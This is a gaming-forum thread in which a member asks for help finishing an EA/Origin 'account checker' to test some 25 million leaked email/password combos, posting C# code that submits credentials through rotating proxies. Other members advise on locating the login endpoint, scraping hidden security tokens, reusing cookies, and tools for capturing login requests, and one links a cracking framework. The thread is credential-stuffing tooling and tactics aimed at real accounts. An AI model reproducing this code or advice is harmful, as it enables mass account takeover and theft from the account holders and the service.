Thread: Account Checker

Results 1 to 15 of 15
  1. #1
    ZeusAlmighty's Avatar
    Join Date
    Sep 2011
    Gender
    male
    Posts
    689
    Reputation
    27
    Thanks
    2,198
    My Mood
    Buzzed

    Account Checker

    Currently working on an Account Checker. I have made pretty much the whole program with multi-thread compatibility etc, just stuck on the bit of finding which url to send the email/pass combo to check if its valid/ how to find it in the future. Currently making an Origin/EA Checker. I have around 25mil+ Combos ready to check for EA accounts. Wonderin if anyone can help? My connection code:

    Code:
    var proxy = new WebProxy(j.Item1, Port: int.Parse(j.Item2));
                                byte[] data = Encoding.ASCII.GetBytes(
                                    $"username={i.Item1}&password={i.Item2}");
    
                                WebRequest request = WebRequest.Create("https://profile.e*****m/");
                                request.Method = "POST";
                                reques*****ntentType = "application/x-www-form-urlencoded";
                                request.Proxy = proxy;
                                reques*****ntentLength = data.Length;
                                using (Stream stream = request.GetRequestStream())
                                {
                                    stream.Write(data, 0, data.Length);
                                }
    
                                string responseContent = null;
    
                                using (WebResponse response = request.GetResponse())
                                {
                                    using (Stream stream = response.GetResponseStream())
                                    {
                                        using (StreamReader sr99 = new StreamReader(stream))
                                        {
                                            responseContent = sr99.ReadToEnd();
                                        }
                                    }
                                }

  2. #2
    RubiconT's Avatar
    Join Date
    Mar 2017
    Gender
    male
    Location
    Here
    Posts
    646
    Reputation
    75
    Thanks
    231
    My Mood
    Relaxed
    use xNet.dll better and faster to make POST/GET requests

  3. #3
    Zaczero's Avatar
    Join Date
    Oct 2013
    Gender
    male
    Location
    localhost
    Posts
    3,288
    Reputation
    1517
    Thanks
    14,262
    My Mood
    Angelic
    This one gave me some redirection going on (success?):


    Request URL:
    https://signin.e*****m/p/web2/login?e...locale%3Den_US


    When creating custom requests you should look for <input> with name like this:

    + you should learn basics of HTML Form
    Last edited by Zaczero; 09-12-2017 at 12:10 PM.
    . . . malsignature.com . . .



    [ global rules ] [ scam report ] [ image title ] [ name change ] [ anime force ]
    [ league of legends marketplace rules ] [ battlefield marketplace rules ]

    "because everytime you post a picture of anime in here
    your virginity's time increases by 1 month"
    ~Smoke 2/18/2018


    Former Staff 09-29-2018
    Battlefield Minion 07-21-2018
    Premium Seller 03-04-2018
    Publicist 12-10-2017
    League of Legends Minion 05-31-2017
    Premium 02-05-2017
    Member 10-13-2013

  4. The Following 2 Users Say Thank You to Zaczero For This Useful Post:

    Gill Bates (09-15-2017),ZeusAlmighty (09-14-2017)

  5. #4
    SawMc's Avatar
    Join Date
    May 2015
    Gender
    male
    Posts
    9
    Reputation
    10
    Thanks
    0
    How is this even related to what the OP posted?

  6. #5
    Silent's Avatar
    Join Date
    Jan 2015
    Gender
    male
    Location
    Melbourne, Australia
    Posts
    5,070
    Reputation
    2172
    Thanks
    8,474
    My Mood
    Bitchy
    Quote Originally Posted by Zaczero View Post
    This one gave me some redirection going on (success?):


    Request URL:
    https://signin.e*****m/p/web2/login?e...locale%3Den_US


    When creating custom requests you should look for <input> with name like this:

    + you should learn basics of HTML Form
    You should note that some websites have security tokens that require you to enter that page before posting the credentials.
    Click Here to visit the official MPGH wiki! Keep up with the latest news and information on games and MPGH! To check out pages dedicated to games, see the links below!











    dd/mm/yyyy
    Member - 31/01/2015
    Premium - 12/09/2016
    Call of Duty minion - 05/11/2016 - 05/11/2019
    BattleOn minion - 28/02/2017 - 05/11/2019
    Battlefield minion - 30/05/2017 - 05/11/2019
    Other Semi-Popular First Person Shooter Hacks minion - 21/09/2017 - 17/09/2019
    Publicist - 07/11/2017 - 02/08/2018
    Cock Sucker - 01/12/2017 - Unknown
    Minion+ - 06/03/2018 - 05/11/2019
    Fortnite minion - 08/05/2018 - 05/11/2019
    Head Publicist - 08/10/2018 - 10/01/2020
    Developer Team - 26/10/2019 - 10/01/2020
    Former Staff - 10/01/2020



  7. #6
    Zaczero's Avatar
    Join Date
    Oct 2013
    Gender
    male
    Location
    localhost
    Posts
    3,288
    Reputation
    1517
    Thanks
    14,262
    My Mood
    Angelic
    Quote Originally Posted by Silent View Post


    You should note that some websites have security tokens that require you to enter that page before posting the credentials.
    this one doesn't have
    . . . malsignature.com . . .



    [ global rules ] [ scam report ] [ image title ] [ name change ] [ anime force ]
    [ league of legends marketplace rules ] [ battlefield marketplace rules ]

    "because everytime you post a picture of anime in here
    your virginity's time increases by 1 month"
    ~Smoke 2/18/2018


    Former Staff 09-29-2018
    Battlefield Minion 07-21-2018
    Premium Seller 03-04-2018
    Publicist 12-10-2017
    League of Legends Minion 05-31-2017
    Premium 02-05-2017
    Member 10-13-2013

  8. #7
    Silent's Avatar
    Join Date
    Jan 2015
    Gender
    male
    Location
    Melbourne, Australia
    Posts
    5,070
    Reputation
    2172
    Thanks
    8,474
    My Mood
    Bitchy
    Quote Originally Posted by Zaczero View Post


    this one doesn't have
    Just for future reference
    Click Here to visit the official MPGH wiki! Keep up with the latest news and information on games and MPGH! To check out pages dedicated to games, see the links below!











    dd/mm/yyyy
    Member - 31/01/2015
    Premium - 12/09/2016
    Call of Duty minion - 05/11/2016 - 05/11/2019
    BattleOn minion - 28/02/2017 - 05/11/2019
    Battlefield minion - 30/05/2017 - 05/11/2019
    Other Semi-Popular First Person Shooter Hacks minion - 21/09/2017 - 17/09/2019
    Publicist - 07/11/2017 - 02/08/2018
    Cock Sucker - 01/12/2017 - Unknown
    Minion+ - 06/03/2018 - 05/11/2019
    Fortnite minion - 08/05/2018 - 05/11/2019
    Head Publicist - 08/10/2018 - 10/01/2020
    Developer Team - 26/10/2019 - 10/01/2020
    Former Staff - 10/01/2020



  9. #8
    crypticgod's Avatar
    Join Date
    Nov 2017
    Gender
    male
    Posts
    22
    Reputation
    10
    Thanks
    23
    Quote Originally Posted by Silent View Post


    You should note that some websites have security tokens that require you to enter that page before posting the credentials.
    How to solve that problem if they have security token ?

  10. #9
    Zaczero's Avatar
    Join Date
    Oct 2013
    Gender
    male
    Location
    localhost
    Posts
    3,288
    Reputation
    1517
    Thanks
    14,262
    My Mood
    Angelic
    Quote Originally Posted by crypticgod View Post
    How to solve that problem if they have security token ?
    download page content and fetch the security token
    they are usually stored as a value in hidden input
    . . . malsignature.com . . .



    [ global rules ] [ scam report ] [ image title ] [ name change ] [ anime force ]
    [ league of legends marketplace rules ] [ battlefield marketplace rules ]

    "because everytime you post a picture of anime in here
    your virginity's time increases by 1 month"
    ~Smoke 2/18/2018


    Former Staff 09-29-2018
    Battlefield Minion 07-21-2018
    Premium Seller 03-04-2018
    Publicist 12-10-2017
    League of Legends Minion 05-31-2017
    Premium 02-05-2017
    Member 10-13-2013

  11. #10
    crypticgod's Avatar
    Join Date
    Nov 2017
    Gender
    male
    Posts
    22
    Reputation
    10
    Thanks
    23
    Quote Originally Posted by Zaczero View Post


    download page content and fetch the security token
    they are usually stored as a value in hidden input
    Is it good to learn c# or python for cracking / making checkers ??

    i am bit confused ..can i contact you on skype

  12. #11
    Zaczero's Avatar
    Join Date
    Oct 2013
    Gender
    male
    Location
    localhost
    Posts
    3,288
    Reputation
    1517
    Thanks
    14,262
    My Mood
    Angelic
    Quote Originally Posted by crypticgod View Post
    Is it good to learn c# or python for cracking / making checkers ??

    i am bit confused ..can i contact you on skype
    I don't know python very well :P
    I haven't done any checkers too
    But yeah, my Skype is: mrzaczer0
    I'm good at c#
    . . . malsignature.com . . .



    [ global rules ] [ scam report ] [ image title ] [ name change ] [ anime force ]
    [ league of legends marketplace rules ] [ battlefield marketplace rules ]

    "because everytime you post a picture of anime in here
    your virginity's time increases by 1 month"
    ~Smoke 2/18/2018


    Former Staff 09-29-2018
    Battlefield Minion 07-21-2018
    Premium Seller 03-04-2018
    Publicist 12-10-2017
    League of Legends Minion 05-31-2017
    Premium 02-05-2017
    Member 10-13-2013

  13. #12
    ImAssKingAQuestion's Avatar
    Join Date
    Jun 2014
    Gender
    male
    Posts
    1
    Reputation
    10
    Thanks
    0
    Check out my checker base that I made on ******/justsum1uknow/CrackerBase

    Also some sites use cookies, make sure you make a GET request and store the cookie, then use the cookie in your post request.

  14. #13
    v_jones_yt's Avatar
    Join Date
    Jan 2018
    Gender
    male
    Location
    somewhere in the universe
    Posts
    18
    Reputation
    10
    Thanks
    1
    My Mood
    Inspired
    Good Job Working On That

  15. #14
    thoughtful's Avatar
    Join Date
    Nov 2017
    Gender
    male
    Location
    Canada
    Posts
    471
    Reputation
    30
    Thanks
    118
    My Mood
    Relaxed
    Quote Originally Posted by ZeusAlmighty View Post
    Currently working on an Account Checker. I have made pretty much the whole program with multi-thread compatibility etc, just stuck on the bit of finding which url to send the email/pass combo to check if its valid/ how to find it in the future. Currently making an Origin/EA Checker. I have around 25mil+ Combos ready to check for EA accounts. Wonderin if anyone can help? My connection code:

    Code:
    var proxy = new WebProxy(j.Item1, Port: int.Parse(j.Item2));
                                byte[] data = Encoding.ASCII.GetBytes(
                                    $"username={i.Item1}&password={i.Item2}");
    
                                WebRequest request = WebRequest.Create("https://profile.e*****m/");
                                request.Method = "POST";
                                reques*****ntentType = "application/x-www-form-urlencoded";
                                request.Proxy = proxy;
                                reques*****ntentLength = data.Length;
                                using (Stream stream = request.GetRequestStream())
                                {
                                    stream.Write(data, 0, data.Length);
                                }
    
                                string responseContent = null;
    
                                using (WebResponse response = request.GetResponse())
                                {
                                    using (Stream stream = response.GetResponseStream())
                                    {
                                        using (StreamReader sr99 = new StreamReader(stream))
                                        {
                                            responseContent = sr99.ReadToEnd();
                                        }
                                    }
                                }
    Man i should really get back to coding, Haven't coded in years

  16. #15
    KEEPITONLINE's Avatar
    Join Date
    Mar 2018
    Gender
    male
    Posts
    10
    Reputation
    10
    Thanks
    0
    You can use google chrome extensions like postman that really helps capture the information needed to use when posting.

    Or other tools such as HTTP Analyzer, Fiddler, HTTP Pro ect there are many out there and will help you a lot in the future specially if there are any intermediate urls needed to grab tokens before logging in.

Similar Threads

  1. Account checker?
    By demonnator in forum Minecraft Discussions
    Replies: 17
    Last Post: 08-02-2013, 07:59 AM
  2. Minecraft Account Checker
    By Some_Man in forum Minecraft Help
    Replies: 5
    Last Post: 12-22-2012, 10:04 AM
  3. a combat arms account checker
    By kolec94 in forum Combat Arms Hack Requests
    Replies: 5
    Last Post: 12-02-2011, 01:44 PM
  4. [Release] Email Account Checker [Check Hotmail & Gmail] [100% Accurate]
    By TheBest-1337 in forum C# Programming
    Replies: 6
    Last Post: 05-16-2011, 05:01 PM
  5. Combat arms account checker
    By mariofan901 in forum Combat Arms Discussions
    Replies: 11
    Last Post: 10-03-2009, 05:04 AM